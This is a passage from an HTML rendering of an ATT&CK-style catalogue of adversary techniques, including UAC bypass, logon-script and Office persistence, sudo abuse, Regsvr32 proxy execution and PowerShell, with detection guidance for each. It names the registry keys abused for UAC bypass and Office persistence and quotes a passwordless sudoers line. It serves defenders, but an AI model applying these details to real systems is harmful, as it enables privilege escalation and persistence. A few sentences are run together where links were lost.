<p>Windows User Account Control (UAC) allows a program to elevate its privileges to perform a task under administrator-level permissions by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.DLL Injection and unusual loaded DLLs through DLL Search Order Hijacking, which indicate attempts to gain access to higher privileged processes.</p>
</div>
<div class="paragraph">
<p>Some UAC bypass methods rely on modifying specific, user-accessible Registry settings. For example:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>The &lt;code&gt;eventvwr.exe&lt;/code&gt; bypass uses the &lt;code&gt;[HKEY_CURRENT_USER]\Software\Classes\mscfile\shell\open\command&lt;/code&gt; Registry key.[[Citation: enigma0x3 Fileless UAC Bypass]]</p>
</li>
<li>
<p>The &lt;code&gt;sdclt.exe&lt;/code&gt; bypass uses the &lt;code&gt;[HKEY_CURRENT_USER]\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe&lt;/code&gt; and &lt;code&gt;[HKEY_CURRENT_USER]\Software\Classes\exefile\shell\runas\command\isolatedCommand&lt;/code&gt; Registry keys.[[Citation: enigma0x3 sdclt app paths]][[Citation: enigma0x3 sdclt bypass]]</p>
</li>
</ul>
</div>
<div class="paragraph">
<p>Analysts should monitor these Registry settings for unauthorized changes.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2012, Windows 7, Windows 8, Windows Server 2008 R2, Windows Server 2012 R2, Windows 8.1, Windows 10</p>
</div>
<div class="paragraph">
<p>Data Sources: System calls, Process monitoring, Authentication logs, Process command-line parameters</p>
</div>
<div class="paragraph">
<p>Effective Permissions: Administrator</p>
</div>
<div class="paragraph">
<p>Contributors: Stefan Kanthak, Casey Smith</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 638. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1088">https://attack.mitre.org/wiki/Technique/T1088</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/">https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://github.com/hfiref0x/UACME">https://github.com/hfiref0x/UACME</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://technet.microsoft.com/en-us/itpro/windows/keep-secure/how-user-account-control-works">https://technet.microsoft.com/en-us/itpro/windows/keep-secure/how-user-account-control-works</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths/">https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://msdn.microsoft.com/en-us/library/ms679687.aspx">https://msdn.microsoft.com/en-us/library/ms679687.aspx</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/">https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://technet.microsoft.com/en-US/magazine/2009.07.uac.aspx">https://technet.microsoft.com/en-US/magazine/2009.07.uac.aspx</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.pretentiousname.com/misc/win7%20uac%20whitelist2.html">http://www.pretentiousname.com/misc/win7%20uac%20whitelist2.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://pen-testing.sans.org/blog/pen-testing/2013/08/08/psexec-uac-bypass">http://pen-testing.sans.org/blog/pen-testing/2013/08/08/psexec-uac-bypass</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blog.fortinet.com/2016/12/16/malicious-macro-bypasses-uac-to-elevate-privilege-for-fareit-malware">https://blog.fortinet.com/2016/12/16/malicious-macro-bypasses-uac-to-elevate-privilege-for-fareit-malware</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_logon_scripts"><a class="anchor" href="#_logon_scripts"></a><a class="link" href="#_logon_scripts">Logon Scripts</a></h3>
<div class="paragraph">
<p>===Windows===</p>
</div>
<div class="paragraph">
<p>Windows allows logon scripts to be run whenever a specific user or group of users log into a system.[[Citation: TechNet Logon Scripts]] The scripts can be used to perform administrative functions, which may often execute other programs or send information to an internal logging server.</p>
</div>
<div class="paragraph">
<p>If adversaries can access these scripts, they may insert additional code into the logon script to execute their tools when a user logs in. This code can allow them to maintain persistence on a single system, if it is a local script, or to move laterally within a network, if the script is stored on a central server and pushed to many systems. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary.</p>
</div>
<div class="paragraph">
<p>===Mac===</p>
</div>
<div class="paragraph">
<p>Mac allows login and logoff hooks to be run as root whenever a specific user logs into or out of a system. A login hook tells Mac OS X to execute a certain script when a user logs in, but unlike startup items, a login hook executes as root[[Citation: creating login hook]]. There can only be one login hook at a time though. If adversaries can access these scripts, they can insert additional code to the script to execute their tools when a user logs in.</p>
</div>
<div class="paragraph">
<p>Detection: Monitor logon scripts for unusual access by abnormal users or at abnormal times. Look for files added or modified by unusual accounts outside of normal administration duties.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Windows 10, MacOS, OS X</p>
</div>
<div class="paragraph">
<p>Data Sources: File monitoring, Process monitoring</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 639. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1037">https://attack.mitre.org/wiki/Technique/T1037</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://support.apple.com/de-at/HT2420">https://support.apple.com/de-at/HT2420</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://technet.microsoft.com/en-us/library/cc758918(v=ws.10).aspx">https://technet.microsoft.com/en-us/library/cc758918(v=ws.10).aspx</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_connection_proxy"><a class="anchor" href="#_connection_proxy"></a><a class="link" href="#_connection_proxy">Connection Proxy</a></h3>
<div class="paragraph">
<p>A connection proxy is used to direct network traffic between systems or act as an intermediary for network communications. Many tools exist that enable traffic redirection through proxies or port redirection, including HTRAN, ZXProxy, and ZXPortMap.[[Citation: Trend Micro APT Attack Tools]]</p>
</div>
<div class="paragraph">
<p>The definition of a proxy can also be expanded out to encompass trust relationships between networks in peer-to-peer, mesh, or trusted connections between networks consisting of hosts or systems that regularly communicate with each other.</p>
</div>
<div class="paragraph">
<p>The network may be within a single organization or across organizations with trust relationships. Adversaries could use these types of relationships to manage command and control communications, to reduce the number of simultaneous outbound network connections, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion.</p>
</div>
<div class="paragraph">
<p>Detection: Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Network activities disassociated from user-driven actions from processes that normally require user direction are suspicious.</p>
</div>
<div class="paragraph">
<p>Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server or between clients that should not or often do not communicate with one another). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.[[Citation: University of Birmingham C2]]</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Linux, Windows 10, MacOS, OS X</p>
</div>
<div class="paragraph">
<p>Data Sources: Process use of network, Process monitoring, Netflow/Enclave netflow, Packet capture</p>
</div>
<div class="paragraph">
<p>Contributors: Walker Johnson</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 640. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1090">https://attack.mitre.org/wiki/Technique/T1090</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blog.trendmicro.com/trendlabs-security-intelligence/in-depth-look-apt-attack-tools-of-the-trade/">http://blog.trendmicro.com/trendlabs-security-intelligence/in-depth-look-apt-attack-tools-of-the-trade/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf">https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_sudo"><a class="anchor" href="#_sudo"></a><a class="link" href="#_sudo">Sudo</a></h3>
<div class="paragraph">
<p>The sudoers file, &lt;code&gt;/etc/sudoers&lt;/code&gt;, describes which users can run which commands and from which terminals. This also describes which commands users can run as other users or groups. This provides the idea of least privilege such that users are running in their lowest possible permissions for most of the time and only elevate to other users or permissions as needed, typically by prompting for a password. However, the sudoers file can also specify when to not prompt users for passwords with a line like &lt;code&gt;user1 ALL=(ALL) NOPASSWD: ALL&lt;/code&gt;[[Citation: OSX.Dok Malware]].</p>
</div>
<div class="paragraph">
<p>Adversaries can take advantage of these configurations to execute commands as other users or spawn processes with higher privileges. You must have elevated privileges to edit this file though.</p>
</div>
<div class="paragraph">
<p>Detection: On Linux, auditd can alert every time a user&#8217;s actual ID and effective ID are different (this is what happens when you sudo).</p>
</div>
<div class="paragraph">
<p>Platforms: Linux, MacOS, OS X</p>
</div>
<div class="paragraph">
<p>Data Sources: File monitoring</p>
</div>
<div class="paragraph">
<p>Effective Permissions: root</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 641. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1169">https://attack.mitre.org/wiki/Technique/T1169</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blog.malwarebytes.com/threat-analysis/2017/04/new-osx-dok-malware-intercepts-web-traffic/">https://blog.malwarebytes.com/threat-analysis/2017/04/new-osx-dok-malware-intercepts-web-traffic/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_office_application_startup"><a class="anchor" href="#_office_application_startup"></a><a class="link" href="#_office_application_startup">Office Application Startup</a></h3>
<div class="paragraph">
<p>Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started.</p>
</div>
<div class="paragraph">
<p>===Office Template Macros===</p>
</div>
<div class="paragraph">
<p>Microsoft Office contains templates that are part of common Office applications and are used to customize styles. The base templates within the application are used each time an application starts.[[Citation: Microsoft Change Normal Template]]</p>
</div>
<div class="paragraph">
<p>Office Visual Basic for Applications (VBA) macros[[Citation: MSDN VBA in Office]] can inserted into the base templated and used to execute code when the respective Office application starts in order to obtain persistence. Examples for both Word and Excel have been discovered and published. By default, Word has a Normal.dotm template created that can be modified to include a malicious macro. Excel does not have a template file created by default, but one can be added that will automatically be loaded.[[Citation: enigma0x3 normal.dotm]][[Citation: Hexacorn Office Template Macros]]</p>
</div>
<div class="paragraph">
<p>Word Normal.dotm location:&lt;code&gt;C:\Users\(username)\AppData\Roaming\Microsoft\Templates\Normal.dotm&lt;/code&gt;</p>
</div>
<div class="paragraph">
<p>Excel Personal.xlsb location:&lt;code&gt;C:\Users\(username)\AppData\Roaming\Microsoft\Excel\XLSTART\PERSONAL.XLSB&lt;/code&gt;</p>
</div>
<div class="paragraph">
<p>An adversary may need to enable macros to execute unrestricted depending on the system or enterprise security policy on use of macros.</p>
</div>
<div class="paragraph">
<p>===Office Test===</p>
</div>
<div class="paragraph">
<p>A Registry location was found that when a DLL reference was placed within it the corresponding DLL pointed to by the binary path would be executed every time an Office application is started[[Citation: Hexacorn Office Test]]</p>
</div>
<div class="paragraph">
<p>&lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf&lt;/code&gt;</p>
</div>
<div class="paragraph">
<p>===Add-ins===</p>
</div>
<div class="paragraph">
<p>Office add-ins can be used to add functionality to Office programs.[[Citation: Microsoft Office Add-ins]]</p>
</div>
<div class="paragraph">
<p>Add-ins can also be used to obtain persistence because they can be set to execute code when an Office application starts. There are different types of add-ins that can be used by the various Office products; including Word/Excel add-in Libraries (WLL/XLL), VBA add-ins, Office Component Object Model (COM) add-ins, automation add-ins, VBA Editor (VBE), and Visual Studio Tools for Office (VSTO) add-ins.[[Citation: MRWLabs Office Persistence Add-ins]]</p>
</div>
<div class="paragraph">
<p>Detection: Many Office-related persistence mechanisms require changes to the Registry and for binaries, files, or scripts to be written to disk or existing files modified to include malicious scripts. Collect events related to Registry key creation and modification for keys that could be used for Office-based persistence. Modification to base templated, like Normal.dotm, should also be investigated since the base templates should likely not contain VBA macros. Changes to the Office macro security settings should also be investigated.</p>
</div>
<div class="paragraph">
<p>Monitor and validate the Office trusted locations on the file system and audit the Registry entries relevant for enabling add-ins.[[Citation: MRWLabs Office Persistence Add-ins]]</p>
</div>
<div class="paragraph">
<p>Non-standard process execution trees may also indicate suspicious or malicious behavior. Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. If winword.exe is the parent process for suspicious processes and activity relating to other adversarial techniques, then it could indicate that the application was used maliciously.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows 10, Windows Server 2012, Windows 7, Windows 8, Windows Server 2008 R2, Windows Server 2012 R2, Windows 8.1, Windows XP, Windows Vista</p>
</div>
<div class="paragraph">
<p>Data Sources: Process monitoring, Process command-line parameters, Windows Registry, File monitoring</p>
</div>
<div class="paragraph">
<p>Contributors: Loic Jaquemet, Ricardo Dias</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 642. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1137">https://attack.mitre.org/wiki/Technique/T1137</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://msdn.microsoft.com/en-us/vba/office-shared-vba/articles/getting-started-with-vba-in-office">https://msdn.microsoft.com/en-us/vba/office-shared-vba/articles/getting-started-with-vba-in-office</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.hexacorn.com/blog/2014/04/16/beyond-good-ol-run-key-part-10/">http://www.hexacorn.com/blog/2014/04/16/beyond-good-ol-run-key-part-10/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://enigma0x3.net/2014/01/23/maintaining-access-with-normal-dotm/comment-page-1/">https://enigma0x3.net/2014/01/23/maintaining-access-with-normal-dotm/comment-page-1/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://support.office.com/article/Add-or-remove-add-ins-0af570c4-5cf3-4fa9-9b88-403625a0b460">https://support.office.com/article/Add-or-remove-add-ins-0af570c4-5cf3-4fa9-9b88-403625a0b460</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://labs.mwrinfosecurity.com/blog/add-in-opportunities-for-office-persistence/">https://labs.mwrinfosecurity.com/blog/add-in-opportunities-for-office-persistence/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.hexacorn.com/blog/2017/04/19/beyond-good-ol-run-key-part-62/">http://www.hexacorn.com/blog/2017/04/19/beyond-good-ol-run-key-part-62/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://support.office.com/article/Change-the-Normal-template-Normal-dotm-06de294b-d216-47f6-ab77-ccb5166f98ea">https://support.office.com/article/Change-the-Normal-template-Normal-dotm-06de294b-d216-47f6-ab77-ccb5166f98ea</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_regsvr32"><a class="anchor" href="#_regsvr32"></a><a class="link" href="#_regsvr32">Regsvr32</a></h3>
<div class="paragraph">
<p>Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe can be used to execute arbitrary binaries.[[Citation: Microsoft Regsvr32]]</p>
</div>
<div class="paragraph">
<p>Adversaries may take advantage of this functionality to proxy execution of code to avoid triggering security tools that may not monitor execution of, and modules loaded by, the regsvr32.exe process because of whitelists or false positives from Windows using regsvr32.exe for normal operations. Regsvr32.exe is also a Microsoft signed binary.</p>
</div>
<div class="paragraph">
<p>Regsvr32.exe can also be used to specifically bypass process whitelisting using functionality to load COM scriptlets to execute DLLs under user permissions. Since regsvr32.exe is network and proxy aware, the scripts can be loaded by passing a uniform resource locator (URL) to file on an external Web server as an argument during invocation. This method makes no changes to the Registry as the COM object is not actually registered, only executed.[[Citation: SubTee Regsvr32 Whitelisting Bypass]] This variation of the technique has been used in campaigns targeting governments.[[Citation: FireEye Regsvr32 Targeting Mongolian Gov]]</p>
</div>
<div class="paragraph">
<p>Detection: Use process monitoring to monitor the execution and arguments of regsvr32.exe. Compare recent invocations of regsvr32.exe with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity. Command arguments used before and after the regsvr32.exe invocation may also be useful in determining the origin and purpose of the script or DLL being loaded.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Windows 10</p>
</div>
<div class="paragraph">
<p>Data Sources: Loaded DLLs, Process monitoring, Windows Registry, Process command-line parameters</p>
</div>
<div class="paragraph">
<p>Contributors: Casey Smith</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 643. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1117">https://attack.mitre.org/wiki/Technique/T1117</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://support.microsoft.com/en-us/kb/249873">https://support.microsoft.com/en-us/kb/249873</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://subt0x10.blogspot.com/2017/04/bypass-application-whitelisting-script.html">https://subt0x10.blogspot.com/2017/04/bypass-application-whitelisting-script.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2017/02/spear%20phishing%20techn.html">https://www.fireeye.com/blog/threat-research/2017/02/spear%20phishing%20techn.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_file_and_directory_discovery"><a class="anchor" href="#_file_and_directory_discovery"></a><a class="link" href="#_file_and_directory_discovery">File and Directory Discovery</a></h3>
<div class="paragraph">
<p>Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system.</p>
</div>
<div class="paragraph">
<p>===Windows===</p>
</div>
<div class="paragraph">
<p>Example utilities used to obtain this information are &lt;code&gt;dir&lt;/code&gt; and &lt;code&gt;tree&lt;/code&gt;.Windows Management Instrumentation and PowerShell.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Linux, Windows 10, MacOS, OS X</p>
</div>
<div class="paragraph">
<p>Data Sources: File monitoring, Process monitoring, Process command-line parameters</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 644. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1083">https://attack.mitre.org/wiki/Technique/T1083</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html">http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_commonly_used_port"><a class="anchor" href="#_commonly_used_port"></a><a class="link" href="#_commonly_used_port">Commonly Used Port</a></h3>
<div class="paragraph">
<p>Adversaries may communicate over a commonly used port to bypass firewalls or network detection systems and to blend with normal network activity to avoid more detailed inspection. They may use commonly open ports such as
* TCP:80 (HTTP)
* TCP:443 (HTTPS)
* TCP:25 (SMTP)
* TCP/UDP:53 (DNS)</p>
</div>
<div class="paragraph">
<p>They may use the protocol associated with the port or a completely different protocol.</p>
</div>
<div class="paragraph">
<p>For connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), examples of common ports are
* TCP/UDP:135 (RPC)
* TCP/UDP:22 (SSH)
* TCP/UDP:3389 (RDP)</p>
</div>
<div class="paragraph">
<p>Detection: Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.[[Citation: University of Birmingham C2]]</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Linux, Windows 10, MacOS, OS X</p>
</div>
<div class="paragraph">
<p>Data Sources: Packet capture, Netflow/Enclave netflow, Process use of network, Process monitoring</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 645. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1043">https://attack.mitre.org/wiki/Technique/T1043</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf">https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_data_encoding"><a class="anchor" href="#_data_encoding"></a><a class="link" href="#_data_encoding">Data Encoding</a></h3>
<div class="paragraph">
<p>Command and control (C2) information is encoded using a standard data encoding system. Use of data encoding may be to adhere to existing protocol specifications and includes use of ASCII, Unicode, Base64, MIME, UTF-8, or other binary-to-text and character encoding systems.[[Citation: Wikipedia Binary-to-text Encoding]][[Citation: Wikipedia Character Encoding]] Some data encoding systems may also result in data compression, such as gzip.</p>
</div>
<div class="paragraph">
<p>Detection: Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.[[Citation: University of Birmingham C2]]</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Linux, Windows 10, MacOS, OS X</p>
</div>
<div class="paragraph">
<p>Data Sources: Packet capture, Process use of network, Process Monitoring, Network protocol analysis</p>
</div>
<div class="paragraph">
<p>Contributors: Itzik Kotler, SafeBreach</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 646. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1132">https://attack.mitre.org/wiki/Technique/T1132</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://en.wikipedia.org/wiki/Character%20encoding">https://en.wikipedia.org/wiki/Character%20encoding</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://en.wikipedia.org/wiki/Binary-to-text%20encoding">https://en.wikipedia.org/wiki/Binary-to-text%20encoding</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf">https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_credentials_in_files"><a class="anchor" href="#_credentials_in_files"></a><a class="link" href="#_credentials_in_files">Credentials in Files</a></h3>
<div class="paragraph">
<p>Adversaries may search local file systems and remote file shares for files containing passwords. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.</p>
</div>
<div class="paragraph">
<p>It is possible to extract passwords from backups or saved virtual machines through Credential Dumping.Valid Accounts for more information.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Windows 10, Linux, MacOS, OS X</p>
</div>
<div class="paragraph">
<p>Data Sources: File monitoring, Process command-line parameters</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 647. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1081">https://attack.mitre.org/wiki/Technique/T1081</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://carnal0wnage.attackresearch.com/2014/05/mimikatz-against-virtual-machine-memory.html">http://carnal0wnage.attackresearch.com/2014/05/mimikatz-against-virtual-machine-memory.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blogs.technet.com/b/srd/archive/2014/05/13/ms14-025-an-update-for-group-policy-preferences.aspx">http://blogs.technet.com/b/srd/archive/2014/05/13/ms14-025-an-update-for-group-policy-preferences.aspx</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_powershell"><a class="anchor" href="#_powershell"></a><a class="link" href="#_powershell">PowerShell</a></h3>
<div class="paragraph">
<p>PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.[[Citation: TechNet PowerShell]] Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process cmdlet which can be used to run an executable and the Invoke-Command cmdlet which runs a command locally or on a remote computer.</p>
</div>
<div class="paragraph">
<p>PowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk.</p>
</div>
<div class="paragraph">
<p>Administrator permissions are required to use PowerShell to connect to remote systems.</p>
</div>
<div class="paragraph">
<p>A number of PowerShell-based offensive testing tools are available, including Empire,[[Citation: Github PowerShell Empire]] PowerSploit,[[Citation: Powersploit]] and PSAttack.[[Citation: Github PSAttack]]</p>
</div>
<div class="paragraph">
<p>Detection: If proper execution policy is set, adversaries will likely be able to define their own execution policy if they obtain administrator or system access, either through the Registry or at the command line. This change in policy on a system may be a way to detect malicious use of PowerShell. If PowerShell is not used in an environment, then simply looking for PowerShell execution may detect malicious activity.</p>
</div>
<div class="paragraph">
<p>It is also beneficial to turn on PowerShell logging to gain increased fidelity in what occurs during execution.[[Citation: Malware Archaeology PowerShell Cheat Sheet]] PowerShell 5.0 introduced enhanced logging capabilities, and some of those features have since been added to PowerShell 4.0. Earlier versions of PowerShell do not have many logging features.[[Citation: FireEye PowerShell Logging 2016]] An organization can gather PowerShell execution details in a data analytic platform to supplement it with other data.</p>
</div>
<div class="paragraph">
